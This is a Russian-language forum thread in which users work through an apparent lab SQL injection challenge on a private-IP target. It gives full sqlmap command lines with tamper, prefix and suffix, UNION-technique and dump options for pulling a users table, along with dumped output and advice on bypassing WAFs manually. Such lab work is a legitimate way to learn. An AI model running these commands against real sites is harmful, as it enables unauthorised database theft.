 |
|

17.12.2016, 14:48
|
|
Новичок
Регистрация: 20.10.2016
Сообщений: 0
С нами:
5033900
Репутация:
0
|
|
Очень хочется решить эту задачу =) Если кто в курсе, подскажите, чего не хватает.
sqlmap --flush-session --tamper randomcase --random-agent --level 5 --code= 200 --prefix " ')" --suffix=" -- - " --risk 3 -v 2 --url " http://192.168.101.9:443/post.php?id=*" --technique U -D site --threads 10 --tables --common-tables
--tamper randomcase-- использовать фильтр скульмапа для генерации пейлоада в различном регистре
--random-agent-- использовать случайный UserAgent
--code=200-- использовать в качестве валидных ответов заголовок ответа 200 ок, 301(редирект) будет распознан как невалидный запрос
--level 5--использовать маскимальный уровень поиска векторов
--risk3 почти тоже самое что и --level
--technique U--пытаться использовать только векторы UnionBased SQL injection
--url "http://someurl.php?id=*"-- астериксом(*) мы указываем место для инжекта
--prefix-- то что использовать в начале запроса
--suffix-- то что использовать в конце запроса
--threads 10- к-тво потоков
Ошибка [ERROR] unable to retrieve the number of databases.
--flush-session -очистить сессию скульмапа

|
|
|

17.12.2016, 19:34
|
|
Новичок
Регистрация: 07.12.2016
Сообщений: 0
С нами:
4963406
Репутация:
0
|
|
~~DarkNode~~ сказал(а):
sqlmap--flush-session --tamper randomcase --random-agent --level 5 --code=200 --prefix "')" --suffix="-- - " --risk 3 -v 2 --url "http://192.168.101.9:443/post.php?id=*" --techniqueU -D site --threads 10 --tables --common-tables
Как обычно на отлично!
Теперь у меня остался один не решенный вопрос - --code=200 --prefix "')" --suffix=" -- - " <--- если бы это не было указано, скульмап не нашел бы это самостоятельно. Из чего получается, что с префиксами и суфиксами требуется ручная работа. Верно я понимаю?
дополнение:
[18:54:24] [INFO] analyzing table dump for possible password hashes
Database: site
Table: users
[1 entry]
+----+-----------+
| id | username |
+----+-----------+
| 1 | e.lindsey |
+----+-----------+
Но хэша нет...
sqlmap --tamper randomcase --random-agent --level 5 --code=200 --prefix "')" --suffix=" -- - " --risk 3 -v 2 --url "http://192.168.101.9:443/post.php?id=*" --technique U -D site --threads 10 --tables --common-tables -T users --dump
пробовал так. что опять упустил?
|
|
|

17.12.2016, 19:53
|
|
Новичок
Регистрация: 20.10.2016
Сообщений: 0
С нами:
5033900
Репутация:
0
|
|
ghostphisher сказал(а):
Как обычно на отлично!
Теперь у меня остался один не решенный вопрос - --code=200 --prefix "')" --suffix=" -- - " <--- если бы это не было указано, скульмап не нашел бы это самостоятельно. Из чего получается, что с префиксами и суфиксами требуется ручная работа. Верно я понимаю?
Только в 2 раза меньше таблиц=)
Нашел бы,просто так быстрее, --code=200 тут нужно потому что тут не стандартное поведение контента,тут нету ошибки на вывод,тут есть редирект вместо ошибки. По идеи и без этого параметра должно отработать,но sqlmap - это программа,не стоит забывать,она может не коректно понимать логику поведения страницы,и именно в таких ситуациях лучше использовать такой параметр)
|
|
|

17.12.2016, 20:07
|
|
Новичок
Регистрация: 20.10.2016
Сообщений: 0
С нами:
5033900
Репутация:
0
|
|
ghostphisher сказал(а):
[18:54:24] [INFO] analyzing table dump for possible password hashes
Database: site
Table: users
[1 entry]
+----+-----------+
| id | username |
+----+-----------+
| 1 | e.lindsey |
+----+-----------+
Но хэша нет...
sqlmap --tamper randomcase --random-agent --level 5 --code=200 --prefix "')" --suffix=" -- - " --risk 3 -v 2 --url "http://192.168.101.9:443/post.php?id=*" --technique U -D site --threads 10 --tables --common-tables -T users --dump
пробовал так. что опять упустил?
Попробуй сперва найти столбец password в таблице users. Я не помню просто есть ли точно он в common-columns,но должен быть.
Попробуй сначала так:
sqlmap --tamper randomcase --random-agent --level 5 --code=200 --prefix "')" --suffix=" -- - " --risk 3 -v 2 --url "http://192.168.101.9:443/post.php?id=*" --technique U -D site --threads 10 -T users --common-columns
А потом
sqlmap --tamper randomcase --random-agent --level 5 --code=200 --prefix "')" --suffix=" -- - " --risk 3 -v 2 --url "http://192.168.101.9:443/post.php?id=*" --technique U -D site --threads 10 -T users --dump
Или же просто так:
sqlmap --tamper randomcase --random-agent --level 5 --code=200 --prefix "')" --suffix=" -- - " --risk 3 -v 2 --url "http://192.168.101.9:443/post.php?id=*" --technique U -D site --threads 10 -T users -С username,password --dump
|
|
|

17.12.2016, 20:18
|
|
Новичок
Регистрация: 20.10.2016
Сообщений: 0
С нами:
5033900
Репутация:
0
|
|
Вообще,сугубо мое мнение по поводу sqlmap - это утилита которая используется больше как для постэксплуатации sql injection , но не для поиска. Уязвимость находится сперва ,проверяется на наличия WAF-а,изучается поведения вафа, и только потом в бой выходит скульмап)
На своем опыте я встречал такие инъекции которые посылали скульмап куда подальше,но руки никогда не подводили))
Вот пару старых моих видео про работу руками если кому интересно:
[hide=12]
|
|
|

17.12.2016, 21:28
|
|
Новичок
Регистрация: 07.12.2016
Сообщений: 0
С нами:
4963406
Репутация:
0
|
|
~~DarkNode~~ сказал(а):
Вообще,сугубо мое мнение по поводу sqlmap - это утилита которая используется больше как для постэксплуатации sql injection , но не для поиска. Уязвимость находится сперва ,проверяется на наличия WAF-а,изучается поведения вафа, и только потом в бой выходит скульмап)
На своем опыте я встречал такие инъекции которые посылали скульмап куда подальше,но руки никогда не подводили))
итог тот же
Database: site
Table: users
[1 entry]
+----+-----------+
| id | username |
+----+-----------+
| 1 | e.lindsey |
+----+-----------+
что ж, это еще раз доказала про руки и мозг Спасибо за подробные ответы - информация очень полезная.
|
|
|

20.12.2016, 21:42
|
|
Новичок
Регистрация: 20.10.2016
Сообщений: 0
С нами:
5033900
Репутация:
0
|
|
sergeyxz сказал(а):
будет время напиши статью про BurpSuite...
Боюсь в одну статью это может не вместится)
|
|
|

24.12.2016, 09:58
|
|
Новичок
Регистрация: 20.10.2016
Сообщений: 0
С нами:
5033900
Репутация:
0
|
|
HackBar модифицированный
mafiasepa сказал(а):
А что за расширение для инъекции на фоксе?
|
|
|

24.12.2016, 12:08
|
|
Новичок
Регистрация: 20.10.2016
Сообщений: 0
С нами:
5033900
Репутация:
0
|
|
mafiasepa сказал(а):
Спасибо. Очень интересные статьи и довольно подробно описаны.
Я извиняюсь это не твой канал на тубу https://www.youtube.com/channel/UCD-dZRqYVkMEJ0_NVp0frWw
мой
|
|
|

28.12.2016, 11:56
|
|
Новичок
Регистрация: 20.10.2016
Сообщений: 0
С нами:
5033900
Репутация:
0
|
|
KIra сказал(а):
DarkNode, а где можно узнать побольше о запросах ?
О каких именно ?
|
|
|
|
 |
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|